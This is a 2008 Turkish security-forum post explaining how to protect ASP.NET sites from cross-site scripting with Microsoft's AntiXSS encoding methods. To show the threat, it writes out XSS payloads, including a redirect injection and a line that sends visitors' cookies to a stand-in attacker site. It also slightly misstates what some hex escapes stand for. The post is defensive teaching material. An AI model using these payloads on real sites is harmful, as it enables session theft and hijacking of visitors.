PrSB Forum

Yaz geldi,yaz demek tatil demek,tatil de Pяร๒ ƒ๏®uм demek!OKS,ÖSS VE SBS Öğrencilerine tercih döneminde kolaylıklar diler,gönüllerindeki yere gitmelerini temenni ederiz...
 
AnasayfaPortalTakvimGaleriSSSAramaKayıt OlÜye ListesiKullanıcı GruplarıGiriş yap

Paylaş | 
 

 [Xss] Anti - Cross Site Scripting - *Korunma Yöntemi!-600. Mesaj buna değer

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
Rey Ting
Site Güvenliği&Bilgisayar İşleri Sorumlusu
Site Güvenliği&Bilgisayar İşleri Sorumlusu
avatar

Mesaj Sayısı : 721
Yaş : 23
Bugün nasılsın :
O tam bir :
Kayıt tarihi : 05/06/07

MesajKonu: [Xss] Anti - Cross Site Scripting - *Korunma Yöntemi!-600. Mesaj buna değer   Salı Tem. 15, 2008 12:05 pm

600'ü VURDUM!!
[b]

[b]Merhabalar..

HacKHeLL.Com
Olarak daha önce forumumuzda xss yi program haline getirerek şu anda üyelerin göremediği yer 'de arşive kaldırmış bulunuyoruz.

Makaleyi okumadan Buraya Tıklatarak Ulaşacağınız Bölümden Xss'nin Ne olduğuna dair bilgiler alabilirsiniz..

Uzun zaman geçti Xss neden hala anlatılmıyor ya/da çalışmıyormu? Gibi sorunlarınıza cavap niteliyi taşıyan sayfaya Buraya Tıklatarak ulaşabilirsiniz..

Bu kadar bilgiden sonra Xss nin hala var olduğunu düşünerek korunma yollarımıza göz atalım.

Cross
Site scripting bilindiği gibi saadece maillerde değil web sitelerini
hackleme yöntemleri arasında 'da bulunmakta.. Ayrıntılı bilgi için
Buraya Bakabilirsiniz..

Makalemizde Cross Site scripting açığından korunmak için gerekli yolları Microsoft tarafından piyasaya sürülen program ile anlatacağım..

Öncelikle Microsoft 'un resmi sitesindeki Microsoft.Application.Security.AntiXSS'yazılımı bilgisayarımıza inndiriyoruz..

Kurulum evreleri Gif örneyi :


Programı install ettikten sonra artık neye yaradığından bahsedelim =)


Microsoft.Application.Security.AntiXSS namespace’inden ulaşabileceğimiz 7 vazgeçilmez metot ile hedeften sitemizi kaçırıcaz bu metotlar ;

• HtmlEncode
• HtmlAttributeEncode
• JavascriptEncode
• UrlEncode
• VisualBasicscriptEncode
• XmlEncode
• XmlAttributeEncode


Örnek :
l
HTML-Kodu:
tAd.Text = “‘); location.href=’http://www.hackhell.com’; alert(’a”);
— Bunun yerine ;

Olması Gereken : l
Kod:
tAd.Text = JavascriptEncode(”‘); location.href=’http://hackhell.com’; alert(’a”);
Neden
böyle olması gerekiyor diye kendi kendinize sorabilirsiniz ANTİXSS
kütüphanesi belli başlı karakterleri ” Encode ” eder bunlar ascii
değeri 160-255 olan karakterlerdir.



_______________
ProfessionaL'lar için
Biraz daha ayrıntıya inerisek;

Kullanıcıdan alınan bilgi olduğu gibi veritabanına kaydediliyorsa ve
aynı şekilde veritabanındanda istemciye gönderiliyorsa kötü niyetli
kodların istemci tarafından çalıştırılması muhtemeldir.



Örneğin bir ziyaretçi defteri doldururken mesaj kısmına
Kod:
location.href= ‘http://www.google.com’;
Gibi
bir bilgi girilirse ve herhangi bir kontrol olmadan bu siteyi ziyaret
eden kullanıcılara bu bilgi gönderilirse, ziyaretçiler karşılarında
sizin sitenizi değil, Google’ı göreceklerdir.



Ziyaretçilerin
tarayıcılarında çalıştırılan bir javascript kodu ziyaretçiniz
hakkındaki Session bilgilerinin de çalınmasına sebep olabilir.

Kod:

document.location='http://www.kotuniyetlisite.com/yaz.aspx?a='+document·cookie

Şeklinde girilen bir script sitenizi ziyaret eden her kullanıcının Session bilgilerini saldırganın sitesine gönderir. Bundan sonrası saldırganın tercihne kalmış. Session bilgilerini kendine mail atabilir yada kendi veritabanına kaydebilir.

ASP.NET programcıları bu konuda diğer web geliştiricilerinden biraz
daha şanslı. Çünkü, “<” ve “>” karakterleri içinde gelen bilgi
“Potansiyel Tehlikeli Bilgi” olarak algılanır ve sistem hata verir.

Ancak günümüz de sık geliştirilen “İçerik Yönetim Sistem” leri “FCK Editor” gibi html kodu üreten WYSWYG* editörleri kullanmakta.




Bu
da ASP.NET programcısının “Fck Editor” kullandığı sayfasının başına
ValidateRequest="false" gibi bir kodu eklemesine sebep veriyor. Bu da
XSS saldırıları için bir davet anlamına gelir.



Buraya kadar verdiğimiz örnekler HTML kodları arasına sızan tekniklerdi.

Kullanıcıdan alınan bilgi ile oluşturulabilecek Javascript, VBscript, XML de bu tehlikelere maruz kalabilir.

Javascript için basit bir örnek verelim.
Default.aspx dosyamızda bulunan Javascript :

Kod:

alert('Merhaba’ + ‘');

Default.aspx.cs dosyasından gönderilen bilgi :
Kod:
ltAd.Text = "heLL";
Sayfa çalıştırıldığında “Merhaba heLL” şeklinde bir MessageBox çıkıyor.

“heLL” değerinin veritabanından geldiğini farzedelim. Eğer veritabanından gelen şöyle bir şey olursa :


Kod:
ltAd.Text = " ' location.href='http://www.google.com'; alert('a";
Sayfamız derlendiğinde ortaya çıkan Javascript kodunu inceleyelim :

Kod:

alert('Merhaba '); location.href='http://www.google.com'; alert('a');

Ziyaretçi “Merhaba” şeklinde bir MessageBox görür ve kendini yine Google da bulur.

Bu konuda örnekler çoğaltılabilir.

Yukarıda verdiğim örnek ile ;


Kod:
ltAd.Text = "'); location.href='http://www.google.com'; alert('a");
yerine;

Kod:
using Microsoft.Security.Application.AntiXss;

...

ltAd.Text =
JavascriptEncode("'); location.href='http://www.google.com'; alert('a");
Şeklinde kullandığımızda bir ziyaretçilerimiz bir zarar görmeyecektir.

Sayfamızı derledikten sonra oluşan Javascript kodumuzu inceleyelim :

Kod:

alert('Merhaba '\x27\x29\x3b
location.href\x3d\x27http\x3a\x2f\x2fwww.google.com\x27\x3b
alert\x28\x27a');

Görüldüğü gibi “)“ işareti \x27 ye , “;” işareti \x29
a ve diğer zararlı karakterlerde Javascript’in karşılıklarına
çevrilmiş. Bu kodlar çalıştırılamaz ama aynı karaktersel değerleini
korurlar.


Örneğin
Kod:
ltAd.Text = Microsoft.Security.Application.AntiXss.JavascriptEncode("heLL");

Şeklinde bir kullanımda ekranda “heLL” yazar ancak kaynak kodunda “ç” karakteri \u00e7 olarak kodlanmıştır.




“ç”
harfi ascii tablosunda bulunmuyor ancak unicode değer olan 351’in
Hexadecimal eşiti 00e7 dir. Dolayısıyla Javascript’tin ç harfini \u00e7
olarak tanır. .
[/b][/b]

_________________
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://prsbforum.google-boards.com
 
[Xss] Anti - Cross Site Scripting - *Korunma Yöntemi!-600. Mesaj buna değer
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Youtube Girmenin Yöntemi

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
PrSB Forum :: Gayri Resmi :: Güvenlik :: Security (Güvenlik)-
Buraya geçin: